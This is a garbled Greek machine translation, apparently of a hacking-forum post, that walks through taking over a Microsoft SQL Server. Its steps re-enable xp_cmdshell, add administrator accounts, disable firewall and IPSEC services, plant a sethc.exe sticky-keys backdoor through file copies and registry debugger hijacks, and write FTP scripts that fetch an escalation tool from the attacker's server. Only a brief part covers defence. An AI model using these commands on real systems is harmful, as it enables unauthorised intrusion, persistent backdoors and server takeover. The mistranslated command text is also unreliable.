sp_addextendedproc Διαδικασία πτώσης sp_oacreate εκτελεστικός sp_dropextendedproc «xp_cmdshell» Βήμα 2 Ανάκτηση: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") Στην πραγματικότητα, αυτό εξακολουθεί να είναι το ίδιο με τα παραπάνω, στην πραγματικότητα, αν είστε προσεκτικοί, το παραπάνω 126 127 θα αποτύχει μόνο να βρει την αποθηκευμένη διαδικασία 'κύριος:. xpcmdshell' επειδή το πρώτο βήμα είναι να διαγράψετε την αποθηκευμένη διαδικασία του cmdshell. Επομένως, σε αυτήν την περίπτωση, απλώς ακολουθήστε το δεύτερο βήμα παραπάνω. 4. Μήνυμα σφάλματος: Ο SQL Server απέκλεισε την πρόσβαση στη διαδικασία «sys.xp_cmdshell» του στοιχείου «xp_cmdshell» επειδή αυτό το στοιχείο τερματίστηκε ως μέρος της διαμόρφωσης ασφαλείας αυτού του διακομιστή. Οι διαχειριστές συστήματος μπορούν να ενεργοποιήσουν το "xp_cmdshell" χρησιμοποιώντας sp_configure. Για περισσότερες πληροφορίες σχετικά με την ενεργοποίηση xp_cmdshell, ανατρέξτε στο θέμα Διαμόρφωση περιφερειακών εφαρμογών στη σειρά βιβλίων SQL Server Online. Αυτή η κατάσταση είναι η απλούστερη, γιατί δεν χρειάζεται να σκεφτείτε τίποτα, απλώς εκτελέστε την ακόλουθη εντολή ; EXEC sp_configure «εμφάνιση σύνθετων επιλογών», 1 -- ; ΕΠΑΝΑΔΙΑΜΌΡΦΩΣΗ ΜΕ ΠΑΡΆΚΑΜΨΗ -- ; EXEC sp_configure 'xp_cmdshell', 1 -- ; ΕΠΑΝΑΔΙΑΜΌΡΦΩΣΗ ΜΕ ΠΑΡΆΚΑΜΨΗ -- ; EXEC sp_configure «εμφάνιση σύνθετων επιλογών», 0 –
Μετά την παραπάνω επιδιόρθωση, μπορείτε να εκτελέσετε την εντολή cmd και θα αρχίσετε να αυξάνετε τη δύναμή σας. Συνήθως ελέγχω πρώτα την ip για να δω αν είναι intranet και, στη συνέχεια, το ερώτημα REG HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber για να ελέγξω τη θύρα τερματικού και, στη συνέχεια, netstat –an για να δω αν το τερματικό είναι ανοιχτό και, στη συνέχεια, τον κωδικό πρόσβασης χρήστη καθαρού χρήστη / προσθέστε έναν χρήστη και, στη συνέχεια, καθαρίστε τους διαχειριστές τοπικής ομάδας χρήστης /add Εάν όλα πάνε καλά, αυτό θα καταργήσει έναν διακομιστή. Αλλά υπάρχουν πολλά προβλήματα στη διαδικασία. 1. Η προώθηση καθαρής ισχύος είναι επιτυχής αλλά δεν μπορεί να συνδεθεί στο τερματικό Υπάρχουν οι ακόλουθες καταστάσεις (1) Ο διακομιστής βρίσκεται στο intranet. (2) Έλεγχος TCP/IP. Εκτελέστε πρώτα την ακόλουθη εντολή cmd: cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, εξάγετε το πρώτο μέρος του μητρώου για φιλτράρισμα TCP/IP cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, εξάγετε το δεύτερο μέρος του μητρώου για φιλτράρισμα TCP/IP cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip", εξάγοντας την τρίτη θέση στο μητρώο σχετικά με το φιλτράρισμα TCP/IP Στη συνέχεια, επιστρέψτε στη μονάδα δίσκου c 1.reg, 2.reg, 3.reg, κατεβάστε το 1.reg, 2.reg 3.reg επιστρέψτε στον σκληρό σας δίσκο για επεξεργασία, βρείτε το πεδίο EnableSecurityFilters για να δείτε αν η τιμή κλειδιού μετά το dword είναι 00000000, εάν είναι 00000001, σημαίνει ότι ο διαχειριστής έχει κάνει φιλτράρισμα tcp/ip, απλά πρέπει να αλλάξουμε το 1 σε 0, 2. Ο Reg και ο 3.reg κάνουν τις ίδιες αλλαγές. (3) Κάντε μια πολιτική ασφάλειας IP. Εκτελέστε την εντολή cmd: cmd /c net stop policyagent για να διακόψετε την υπηρεσία υπηρεσιών IPSEC. Συνδέστε ξανά το τερματικό. (4) Η άδεια σύνδεσης του τερματικού που έχει οριστεί από τον διαχειριστή μπορεί να χρησιμοποιηθεί μόνο από τον καθορισμένο χρήστη. (5) Τείχος προστασίας. Εκτελέστε την εντολή cmd: net stop alg /ynet stop sharedaccess
2. Εμφανίζεται κλιμάκωση NET και δεν επιτρέπεται η πρόσβαση Μπορείτε να δοκιμάσετε τον κωδικό πρόσβασης χρήστη χρήστη net1 /add Εάν το net1 αρνείται επίσης την πρόσβαση, μπορείτε να αντιγράψετε μια κερκόπορτα shfit και να προσπαθήσετε να εκτελέσετε την εντολή cmd: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe Αντιγραφή C:\Windows\System32\sethc.exe C:\Windows\System32\DLLCACHE\sethc.exe Εάν σας ζητηθεί, αντιγράψτε 1 αρχείο που αποδεικνύεται επιτυχές. Συνδεθείτε στο τερματικό και πατήστε 5 shift για να δείτε τι εμφανίζεται. Παίξτε με το Kaka Explorer, τώρα απλώς προσθέστε έναν χρήστη με το χέρι. 3. Η καθαρή κλιμάκωση συμβαίνει με σφάλμα άρνησης πρόσβασης 5 (επισήμανση) Σε αυτήν την περίπτωση, δεν χρειάζεται να δοκιμάσετε το net1, μπορείτε να δοκιμάσετε την κερκόπορτα μετατόπισης αντιγραφής, εάν το αντίγραφο σας ζητήσει να αντιγράψετε το αρχείο 0, αποδεικνύει ότι δεν είναι επιτυχές. Στη συνέχεια, μπορείτε να προσπαθήσετε να το ανεβάσετε, εάν μπορείτε να το ανεβάσετε, μπορείτε να στείλετε απευθείας ένα εργαλείο κλιμάκωσης ισχύος εκτός δικτύου που κυκλοφόρησε πριν από λίγο καιρό και, στη συνέχεια, να προσθέσετε έναν χρήστη. Αλλά οι περισσότερες από αυτές τις περιπτώσεις δεν μπορούν να μεταφορτωθούν, επομένως πρέπει να το σκεφτείτε. Δεδομένου ότι το cmd μπορεί να εκτελεστεί, τότε το αρχείο μπορεί να ληφθεί μέσω cmd στο ftp, αλλά η προϋπόθεση του ftp είναι να μπορεί να γράψει κείμενο ή μαζική επεξεργασία. Στη συνέχεια, μπορείτε να γράψετε ένα κείμενο ή μια δέσμη μέσω μιας δήλωσης SQL. δηλώστε @o int, @f int, @t int @ret int exec sp_oacreate 'scrip remove ting.filesystemobject', @o έξω exec sp_oamethod @o, 'createtextfile', @f έξω, 'C:\1.bat', 1 exec @ret = sp_oamethod @f, 'γραμμή εγγραφής', NULL,'ανοιχτή IP' exec @ret = sp_oamethod @f, 'γραμμή εγγραφής', NULL, 'λογαριασμός ftp' exec @ret = sp_oamethod @f, 'γραμμή εγγραφής', NULL, 'κωδικός πρόσβασης ftp' exec @ret = sp_oamethod @f, 'writeline', NULL, 'get en.exe (χωρίς σενάριο καθαρής κλιμάκωσης) c:\en.exe' exec @ret = sp_oamethod @f, 'γραμμή εγγραφής', NULL,'αντίο' Μετά την επιτυχή εκτέλεση του αναλυτή ερωτημάτων, θα εμφανιστεί ένα 1.bat στη μονάδα δίσκου C (εάν η εκτέλεση είναι επιτυχής, αλλά η μονάδα δίσκου C δεν υπάρχει, μπορείτε να αλλάξετε το φάκελο για εγγραφή, επειδή ο ριζικός κατάλογος της μονάδας δίσκου C του διακομιστή απαγορεύει την εγγραφή) Στη συνέχεια, το cmd εκτελεί ftp -s:c:\1.bat Αφού εκτελεστεί αυτό, θα κάνετε λήψη ενός σεναρίου κλιμάκωσης χωρίς δίκτυο στη μονάδα CFT FTP ή θα γράψετε απευθείας ένα σενάριο κλιμάκωσης VBS δηλώστε @o int, @f int, @t int @ret int exec sp_oacreate 'scrip remove ting.filesystemobject', @o έξω exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1 exec @ret = sp_oamethod @f, 'γραμμή εγγραφής', NULL,'Set o=CreateObject( "Shell.Users" )' exec @ret = sp_oamethod @f, 'γραμμή εγγραφής', NULL,'Ορισμός z=o.create('user")' exec @ret = sp_oamethod @f, 'γραμμή εγγραφής', NULL,'z.changePassword "κωδικός πρόσβασης","' exec @ret = sp_oamethod @f, 'γραμμή εγγραφής', NULL,'z.setting("AccountType")=3' Στη συνέχεια, το cmd εκτελεί cscrip για να αφαιρέσει το t c:\1.vbs 4. Το προηγούμενο επιδιορθώνεται για την εκτέλεση εντολών cmd, αλλά μετά από κάποιες επισκευές, θα εμφανιστούν νέα προβλήματα (1) Μήνυμα: Παρουσιάστηκε σφάλμα κατά την εκτέλεση της xp_cmdshell. Η κλήση 'CreateProcess' απέτυχε με κωδικό σφάλματος: '5'. Το σφάλμα 5 είναι ένας αριθμός σφάλματος που ζητείται από το σύστημα, το CreateProcess είναι η έννοια της δημιουργίας ενός νήματος, αυτή η δημιουργία σφαλμάτων έχει να κάνει πολύ με την cmd.exe των αρχείων συστήματος, το ένα είναι ότι το cmd διαγράφεται, το άλλο είναι ότι η άδεια του cmd μειώνεται. SQL για να ελέγξετε τις θύρες τερματικού και την κατάσταση ανοίγματος: εκτελεστικός πλοίαρχος.. xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber' Εντάξει, το βασικό σημείο παρακάτω είναι να χρησιμοποιήσετε δύο οδηγίες SQL για να αντιγράψετε το αρχείο εξερεύνησης του συστήματος στο αρχείο shift backdoor του συστήματος και οι ακόλουθες δύο δηλώσεις εκτελούνται ξεχωριστά. Αυτή η δήλωση explorer.exe αντιγράφει ως sethc.exe δηλώστε @o int exec sp_oacreate 'scripremove ting.filesystemobject', @o έξω exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe'; Αυτή η πρόταση αντιγράφει sethc.exe στον κατάλογο dllcache δηλώστε @oo int exec sp_oacreate 'scrip remove ting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\ sethc.exe»· Οι άλλες δύο δηλώσεις χρησιμοποιούν sp_oacreate αποθηκευμένες διαδικασίες που πρέπει να χρησιμοποιήσουν odsole70.dll αρχείο, επομένως η επιβίωση αυτού του αρχείου σχετίζεται με την επιτυχία της δημιουργίας του. (2), xpsql.cpp: Σφάλμα 5 από το CreateProcess (γραμμή 737) Αυτή η κατάσταση είναι πιο δύσκολη και λέγεται στο Διαδίκτυο EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0 Επιλέξτε * Από το OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Βάση δεδομένων=c:\windows\system32\ias\ias.mdb','select shell("καθαρός χρήστης 123 123 /add")'); Επιλέξτε * Από το OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Βάση δεδομένων=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")'); Έλεγξα το sandbox για να αυξήσω τα δικαιώματα αυτού του θέματος, αλλά μέσω της πρακτικής μου, αυτό το ποσοστό επιτυχίας είναι πολύ χαμηλό, επειδή οι περισσότεροι διακομιστές έχουν διαγράψει το c:\windows\system32\ias\ias.mdb. Στη συνέχεια, μπορείτε να δοκιμάσετε την πειρατεία εικόνας, φυσικά, η πειρατεία εικόνας είναι επίσης υπό όρους, 1 για να υπάρχει xp_regwrite αυτή η αποθηκευμένη διαδικασία 2 είναι 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',' Το πρόγραμμα εντοπισμού σφαλμάτων δεν διαγράφεται Μπορείτε πρώτα να ρωτήσετε εάν το σταθερό κλειδί μητρώου έχει παραβιαστεί εκτελεστικός πλοίαρχος.. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger' Εάν η προτροπή δεν εντοπίσει το πρόβλημα, η απόδειξη διαγράφεται, δεν υπάρχει τρόπος, εάν σας ζητηθεί sethc.exe εκτελέσετε την εντολή sql EXEC master.. xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. ΕΞΕ», @value_name='Πρόγραμμα εντοπισμού σφαλμάτων', @type='REG_SZ', @value='C:\WINDOWS\explorer.exe' Αφού συνδεθείτε στο τερματικό 5 φορές και αλλάξετε, πηγαίνει απευθείας στην επιφάνεια εργασίας και, στη συνέχεια, το προσθέτει χειροκίνητα.
Το μητρώο τροποποιεί τη θύρα τερματικού
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp]
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp,
Όσον αφορά την πρόληψη της πειρατείας εικόνας, επιτυγχάνεται κυρίως με τις ακόλουθες μεθόδους:
★ Νόμος Περιορισμού Αδειών
Εάν ο χρήστης δεν έχει πλέον πρόσβαση στο κλειδί μητρώου, δεν μπορεί να τροποποιήσει αυτά τα πράγματα. Ανοίξτε τον Επεξεργαστή Μητρώου και μεταβείτε στο HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options, επιλέξτε αυτό το στοιχείο, κάντε δεξί κλικ - > δικαιώματα - > για προχωρημένους και μειώστε τα δικαιώματα του διαχειριστή και των χρηστών του συστήματος (εδώ πρέπει απλώς να ακυρώσετε τη λειτουργία εγγραφής).
★ Γρήγορη κοπή με μαχαίρι ακατάστατη μέθοδος κάνναβης
Ανοίξτε τον επεξεργαστή μητρώου και μεταβείτε στη γραμμή
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image Επιλογές εκτέλεσης αρχείου
Το πρόβλημα μπορεί να λυθεί διαγράφοντας απευθείας το στοιχείο Επιλογές εκτέλεσης αρχείου εικόνας.
Η εντολή SQL παραβιάζει την κερκόπορτα εγκατάστασης κολλώδους κλειδιού μητρώου xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 'Πρόγραμμα εντοπισμού σφαλμάτων','REG_SZ','C:\WINDOWS\system32\kdsn.exe'
Λήψη λογισμικού:Τουρίστες, αν θέλετε να δείτε το κρυφό περιεχόμενο αυτής της ανάρτησης, παρακαλώ Απάντηση
|